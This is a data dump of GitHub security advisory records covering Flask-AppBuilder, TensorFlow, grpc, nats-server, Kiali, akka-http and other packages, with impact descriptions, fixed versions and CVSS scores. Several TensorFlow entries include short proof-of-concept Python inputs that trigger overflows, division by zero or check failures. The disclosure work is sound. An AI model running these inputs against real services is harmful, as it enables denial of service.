Discrepancy in Flask-AppBuilder,"### Impact +User enumeration in database authentication in Flask-AppBuilder <= 3.2.3. Allows for a non authenticated user to enumerate existing accounts by timing the response time from the server when you are logging in. + +### Patches +Upgrade to 3.3.0 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [Flask-AppBuilder](https://github.com/dpgaspar/Flask-AppBuilder) + +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Flask-AppBuilder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/security/advisories/GHSA-434h-p4gx-jm89'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29621'}, {'type': 'WEB', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder/commit/780bd0e8fbf2d36ada52edb769477e0a4edae580'}, {'type': 'PACKAGE', 'url': 'https://github.com/dpgaspar/Flask-AppBuilder'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r466759f377651f0a690475d5a52564d0e786e82c08d5a5730a4f8352@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5b754118ba4e996adf03863705d34168bffec202da5c6bdc9bf3add5@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r91067f953906d93aaa1c69fe2b5472754019cc6bd4f1ba81349d62a0@%3Ccommits.airflow.apache.org%3E'}, {'type': 'WEB', 'url': 'https://pypi.org/project/Flask-AppBuilder/'}]","{'cwe_ids': ['CWE-203'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:21:31Z', 'nvd_published_at': '2021-06-07T19:15:00Z'}" +1.4.0,GHSA-xvjm-fvxx-q3hv,2021-05-18T17:23:38Z,2021-05-21T14:26:38Z,,['CVE-2021-29584'],CHECK-fail due to integer overflow,"### Impact +An attacker can trigger a denial of service via a `CHECK`-fail in caused by an integer overflow in constructing a new tensor shape: + +```python +import tensorflow as tf + +input_layer = 2**60-1 +sparse_data = tf.raw_ops.SparseSplit( + split_dim=1, + indices=[(0, 0), (0, 1), (0, 2), + (4, 3), (5, 0), (5, 1)], + values=[1.0, 1.0, 1.0, 1.0, 1.0, 1.0], + shape=(input_layer, input_layer), + num_split=2, + name=None + ) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/0908c2f2397c099338b901b067f6495a5b96760b/tensorflow/core/kernels/sparse_split_op.cc#L66-L70) builds a dense shape without checking that the dimensions would not result in overflow: + +```cc +sparse::SparseTensor sparse_tensor; +OP_REQUIRES_OK(context, + sparse::SparseTensor::Create( + input_indices, input_values, + TensorShape(input_shape.vec()), &sparse_tensor)); +``` + +The [`TensorShape` constructor](https://github.com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L183-L188) uses a `CHECK` operation which triggers when [`InitDims`](https://github.com/tensorflow/tensorflow/blob/6f9896890c4c703ae0a0845394086e2e1e523299/tensorflow/core/framework/tensor_shape.cc#L212-L296) returns a non-OK status. + +```cc +template +TensorShapeBase::TensorShapeBase(gtl::ArraySlice dim_sizes) { + set_tag(REP16); + set_data_type(DT_INVALID); + TF_CHECK_OK(InitDims(dim_sizes)); +} +``` + +In our scenario, this occurs when adding a dimension from the argument results in overflow: + +```cc +template +Status TensorShapeBase::InitDims(gtl::ArraySlice dim_sizes) { + ... + Status status = Status::OK(); + for (int64 s : dim_sizes) { + status.Update(AddDimWithStatus(internal::SubtleMustCopy(s))); + if (!status.ok()) { + return status; + } + } +} + +template +Status TensorShapeBase::AddDimWithStatus(int64 size) { + ... + int64 new_num_elements; + if (kIsPartial && (num_elements() < 0 || size < 0)) { + new_num_elements = -1; + } else { + new_num_elements = MultiplyWithoutOverflow(num_elements(), size); + if (TF_PREDICT_FALSE(new_num_elements < 0)) { + return errors::Internal(""Encountered overflow when multiplying "", + num_elements(), "" with "", size, + "", result: "", new_num_elements); + } + } + ... +} +``` + +This is a legacy implementation of the constructor and operations should use `BuildTensorShapeBase` or `AddDimWithStatus` to prevent `CHECK`-failures in the presence of overflows. + +### Patches +We have patched the issue in GitHub commit [4c0ee937c0f61c4fc5f5d32d9bb4c67428012a60](https://github.com/tensorflow/tensorflow/commit/4c0ee937c0f61c4fc5f5d32d9bb4c67428012a60). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by researchers from University of Virginia and University of California, Santa Barbara.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xvjm-fvxx-q3hv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29584'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/4c0ee937c0f61c4fc5f5d32d9bb4c67428012a60'}]","{'cwe_ids': ['CWE-190'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T17:23:38Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-pp75-xfpw-37g9,2021-04-19T22:57:05Z,2021-05-10T19:16:14Z,,['CVE-2020-7768'],Prototype pollution in grpc and @grpc/grpc-js,"""The package grpc before 1.24.4 and the package @grpc/grpc-js before 1.1.8 are vulnerable to Prototype Pollution via loadPackageDefinition.""","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'grpc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.24.4'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@grpc/grpc-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7768'}, {'type': 'WEB', 'url': 'https://github.com/grpc/grpc-node/pull/1605'}, {'type': 'WEB', 'url': 'https://github.com/grpc/grpc-node/pull/1606'}, {'type': 'WEB', 'url': 'https://github.com/grpc/grpc-node/releases/tag/grpc%401.24.4'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1038819'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-GRPC-598671'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-GRPCGRPCJS-1038818'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/@grpc/grpc-js'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/grpc'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T22:57:05Z', 'nvd_published_at': '2020-11-11T11:15:00Z'}" +1.4.0,GHSA-f39r-cpmj-whcg,2022-07-05T17:39:54Z,2021-05-06T15:55:21Z,,['CVE-2021-23376'],Command Injection in ffmpegdotjs,"This affects all versions of package ffmpegdotjs. If attacker-controlled user input is given to the trimvideo function, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'ffmpegdotjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23376'}, {'type': 'PACKAGE', 'url': 'https://github.com/TRomesh/ffmpegdotjs'}, {'type': 'WEB', 'url': 'https://github.com/TRomesh/ffmpegdotjs/blob/b7395daf0bdcb81218340427eb7073cdd28462af/index.js#23L219'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-FFMPEGDOTJS-1078542'}]","{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T20:46:54Z', 'nvd_published_at': '2021-04-18T19:15:00Z'}" +1.4.0,GHSA-2c64-vj8g-vwrq,2023-08-29T22:08:18Z,2021-05-21T16:11:49Z,,[],Incorrect handling of credential expiry by /nats-io/nats-server,"(This advisory is canonically https://advisories.nats.io/CVE/CVE-2020-26892.txt ) + +## Problem Description + +NATS nats-server through 2020-10-07 has Incorrect Access Control because of how expired credentials are handled. + +The NATS accounts system has expiration timestamps on credentials; the library had an API which encouraged misuse and an `IsRevoked()` method which misused its own API. + +A new `IsClaimRevoked()` method has correct handling and the nats-server has been updated to use this. The old `IsRevoked()` method now always returns true and other client code will have to be updated to avoid calling it. + +The CVE identifier should cover any application using the old JWT API, where the nats-server is one of those applications. + + +## Affected versions + +#### JWT library + + * all versions prior to 1.1.0 + * fixed after nats-io/jwt PR 103 landed (2020-10-06) + +#### NATS Server + + * Version 2 prior to 2.1.9 + + 2.0.0 through and including 2.1.8 are vulnerable. + * fixed with nats-io/nats-server PRs 1632, 1635, 1645 + + +## Impact + +Time-based credential expiry did not work. + + +## Workaround + +Have credentials which only expire after fixes can be deployed. + + +## Solution + +Upgrade the JWT dependency in any application using it. + +Upgrade the NATS server if using NATS Accounts.",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/nats-io/nats-server/v2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.9'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/nats-io/jwt'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nats-io/nats-server/security/advisories/GHSA-2c64-vj8g-vwrq'}, {'type': 'WEB', 'url': 'https://github.com/nats-io/jwt/commit/e11ce317263cef69619fc1ca743b195d02aa1d8a'}, {'type': 'WEB', 'url': 'https://advisories.nats.io/CVE/CVE-2020-26892.txt'}]","{'cwe_ids': ['CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T22:19:22Z', 'nvd_published_at': None}" +1.4.0,GHSA-465w-gg5p-85c9,2021-05-18T20:45:55Z,2021-05-18T21:09:01Z,,['CVE-2020-1762'],Insufficient Session Expiration in Kiali,"An insufficient JWT validation vulnerability was found in Kiali versions 0.4.0 to 1.15.0 and was fixed in Kiali version 1.15.1, wherein a remote attacker could abuse this flaw by stealing a valid JWT cookie and using that to spoof a user session, possibly gaining privileges to view and alter the Istio configuration.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/kiali/kiali'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.0'}, {'fixed': '1.15.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1762'}, {'type': 'WEB', 'url': 'https://github.com/kiali/kiali/commit/93f5cd0b6698e8fe8772afb8f35816f6c086aef1'}, {'type': 'WEB', 'url': 'https://github.com/kiali/kiali/commit/c91a0949683976f621cca213c1193831d63b381c'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1810387'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1762'}, {'type': 'WEB', 'url': 'https://kiali.io/news/security-bulletins/kiali-security-001/'}]","{'cwe_ids': ['CWE-295', 'CWE-384', 'CWE-613'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T20:45:55Z', 'nvd_published_at': None}" +1.4.0,GHSA-wcv5-qrj6-9pfm,2021-05-18T23:25:06Z,2021-05-21T14:21:12Z,,['CVE-2021-29520'],Heap buffer overflow in `Conv3DBackprop*`,"### Impact +Missing validation between arguments to `tf.raw_ops.Conv3DBackprop*` operations can result in heap buffer overflows: + +```python +import tensorflow as tf + +input_sizes = tf.constant([1, 1, 1, 1, 2], shape=[5], dtype=tf.int32) +filter_tensor = tf.constant([734.6274508233133, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, + -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, + -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[4, 1, 6, 1, 1], dtype=tf.float32) +out_backprop = tf.constant([-10.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) + +tf.raw_ops.Conv3DBackpropInputV2(input_sizes=input_sizes, filter=filter_tensor, out_backprop=out_backprop, strides=[1, 89, 29, 89, 1], padding='SAME', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) +``` +```python +import tensorflow as tf + +input_values = [-10.0] * (7 * 7 * 7 * 7 * 7) +input_values[0] = 429.6491056791816 +input_sizes = tf.constant(input_values, shape=[7, 7, 7, 7, 7], dtype=tf.float32) +filter_tensor = tf.constant([7, 7, 7, 1, 1], shape=[5], dtype=tf.int32) +out_backprop = tf.constant([-10.0, -10.0, -10.0, -10.0, -10.0, -10.0, -10.0], shape=[7, 1, 1, 1, 1], dtype=tf.float32) + +tf.raw_ops.Conv3DBackpropFilterV2(input=input_sizes, filter_sizes=filter_tensor, out_backprop=out_backprop, strides=[1, 37, 65, 93, 1], padding='VALID', data_format='NDHWC', dilations=[1, 1, 1, 1, 1]) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/4814fafb0ca6b5ab58a09411523b2193fed23fed/tensorflow/core/kernels/conv_grad_shape_utils.cc#L94-L153) assumes that the `input`, `filter_sizes` and `out_backprop` tensors have the same shape, as they are accessed in parallel. + +### Patches +We have patched the issue in GitHub commit [8f37b52e1320d8d72a9529b2468277791a261197](https://github.com/tensorflow/tensorflow/commit/8f37b52e1320d8d72a9529b2468277791a261197). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our securityguide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-wcv5-qrj6-9pfm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29520'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/8f37b52e1320d8d72a9529b2468277791a261197'}]","{'cwe_ids': ['CWE-120', 'CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:25:06Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-5v95-v8c8-3rh6,2021-05-20T22:26:21Z,2021-05-21T14:32:55Z,,['CVE-2021-22538'],Privilege escalation in rbac,"### Impact +Using a carefully crafted request or malicious proxy, a user with `UserWrite` permissions could create another user with higher privileges than their own due to insufficient checks on the allowed set of permissions. The event would be captured in the Event Log. + +### Patches +The issue has been fixed in 0.24.0 and 0.23.1. + +### Workarounds +For users who are unable to upgrade, we recommend auditing users who have `UserWrite` permissions and regularly reviewing the Event Log for malicious activity. + +### Kudos +Thank you to Michael Mazzolini (Ethical Hacker at WHO) for finding and disclosing this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/google/exposure-notifications-verification-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.23.1'}]}], 'database_specific': {'last_known_affected_version_range': '< 0.23.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/google/exposure-notifications-verification-server/security/advisories/GHSA-5v95-v8c8-3rh6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22538'}, {'type': 'WEB', 'url': 'https://github.com/google/exposure-notifications-verification-server/commit/eb8cf40b12dbe79304f1133c06fb73419383cd95'}, {'type': 'WEB', 'url': 'https://github.com/google/exposure-notifications-verification-server/releases/tag/v0.23.1'}, {'type': 'WEB', 'url': 'https://github.com/google/exposure-notifications-verification-server/releases/tag/v0.24.0'}]","{'cwe_ids': ['CWE-276'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T22:26:21Z', 'nvd_published_at': '2021-03-31T21:15:00Z'}" +1.4.0,GHSA-jpq3-xf27-5jf2,2021-05-04T23:40:42Z,2021-05-06T18:26:42Z,,['CVE-2020-7726'],Prototype Pollution in safe-object2,All versions of package safe-object2 are vulnerable to Prototype Pollution via the setter function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'safe-object2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7726'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-SAFEOBJECT2-598801'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T23:40:42Z', 'nvd_published_at': '2020-09-01T10:15:00Z'}" +1.4.0,GHSA-fqh4-rh59-xhvf,2023-09-14T19:22:34Z,2021-05-18T21:07:43Z,,['CVE-2021-23351'],github.com/pires/go-proxyproto denial of service vulnerability,"The package `github.com/pires/go-proxyproto` before 0.5.0 are vulnerable to Denial of Service (DoS) via the `parseVersion1()` function. The reader in this package is a default `bufio.Reader` wrapping a `net.Conn`. It will read from the connection until it finds a newline. Since no limits are implemented in the code, a deliberately malformed V1 header could be used to exhaust memory in a server process using this code - and create a DoS. This can be exploited by sending a stream starting with PROXY and continuing to send data (which does not contain a newline) until the target stops acknowledging. The risk here is small, because only trusted sources should be allowed to send proxy protocol headers.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/pires/go-proxyproto'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23351'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/issues/69'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/pull/71'}, {'type': 'WEB', 'url': 'https://github.com/pires/go-proxyproto/commit/7f48261db810703d173f27f3309a808cc2b49b8b'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4BNVGJMVI3ZTZ675EFPUHPGXCKCGSX46/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/C36IBVOZXRTWM7MGTRUTOM56P5RR74VU/'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMPIRESGOPROXYPROTO-1081577'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T21:03:39Z', 'nvd_published_at': None}" +1.4.0,GHSA-2w7w-2j92-44hx,2021-03-19T22:36:01Z,2021-05-10T15:17:09Z,,['CVE-2021-23339'],HTTP Request Smuggling in akka-http-core,"A vulnerable Akka HTTP server will accept a malformed message and hand it over to the user. If the user application proxies this message to another server unchanged and that server also accepts that message but interprets it as two HTTP messages, the second message has reached the second server without having been inspected by the proxy.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.typesafe.akka:akka-http-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.2.0'}, {'fixed': '10.2.4'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.typesafe.akka:akka-http-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.1.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23339'}, {'type': 'WEB', 'url': 'https://github.com/akka/akka-http/pull/3754%23issuecomment-779265201'}, {'type': 'WEB', 'url': 'https://github.com/akka/akka-http/commit/e3a4935151c91cee28e65e6b894dd50839ef9d34'}, {'type': 'WEB', 'url': 'https://doc.akka.io/docs/akka-http/10.1/security/2021-02-24-incorrect-handling-of-Transfer-Encoding-header.html'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-COMTYPESAFEAKKA-1075043'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-19T22:36:01Z', 'nvd_published_at': '2021-02-17T08:15:00Z'}" +1.4.0,GHSA-4228-7qvx-f4rq,2021-05-11T17:26:32Z,2021-05-18T01:41:56Z,,['CVE-2020-8186'],Injection and Command Injection in devcert,A command injection vulnerability in the `devcert` module may lead to remote code execution when users of the module pass untrusted input to the `certificateFor` function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'devcert'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8186'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/863544'}]","{'cwe_ids': ['CWE-74', 'CWE-77', 'CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-11T17:26:32Z', 'nvd_published_at': '2020-07-10T16:15:00Z'}" +1.4.0,GHSA-f78g-q7r4-9wcv,2021-05-18T21:21:40Z,2021-05-21T14:23:41Z,,['CVE-2021-29550'],Division by 0 in `FractionalAvgPool`,"### Impact +An attacker can cause a runtime division by zero error and denial of service in `tf.raw_ops.FractionalAvgPool`: + +```python +import tensorflow as tf + +value = tf.constant([60], shape=[1, 1, 1, 1], dtype=tf.int32) +pooling_ratio = [1.0, 1.0000014345305555, 1.0, 1.0] +pseudo_random = False +overlapping = False +deterministic = False +seed = 0 +seed2 = 0 + +tf.raw_ops.FractionalAvgPool( + value=value, pooling_ratio=pooling_ratio, pseudo_random=pseudo_random, + overlapping=overlapping, deterministic=deterministic, seed=seed, seed2=seed2) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/acc8ee69f5f46f92a3f1f11230f49c6ac266f10c/tensorflow/core/kernels/fractional_avg_pool_op.cc#L85-L89) computes a divisor quantity by dividing two user controlled values: + +```cc +for (int i = 0; i < tensor_in_and_out_dims; ++i) { + output_size[i] = static_cast(std::floor(input_size[i] / pooling_ratio_[i])); + DCHECK_GT(output_size[i], 0); +} +``` + +The user controls the values of `input_size[i]` and `pooling_ratio_[i]` (via the `value.shape()` and `pooling_ratio` arguments). If the value in `input_size[i]` is smaller than the `pooling_ratio_[i]`, then the floor operation results in `output_size[i]` being 0. The `DCHECK_GT` line is a no-op outside of debug mode, so in released versions of TF this does not trigger. + +Later, these computed values [are used as arguments](https://github.com/tensorflow/tensorflow/blob/acc8ee69f5f46f92a3f1f11230f49c6ac266f10c/tensorflow/core/kernels/fractional_avg_pool_op.cc#L96-L99) to 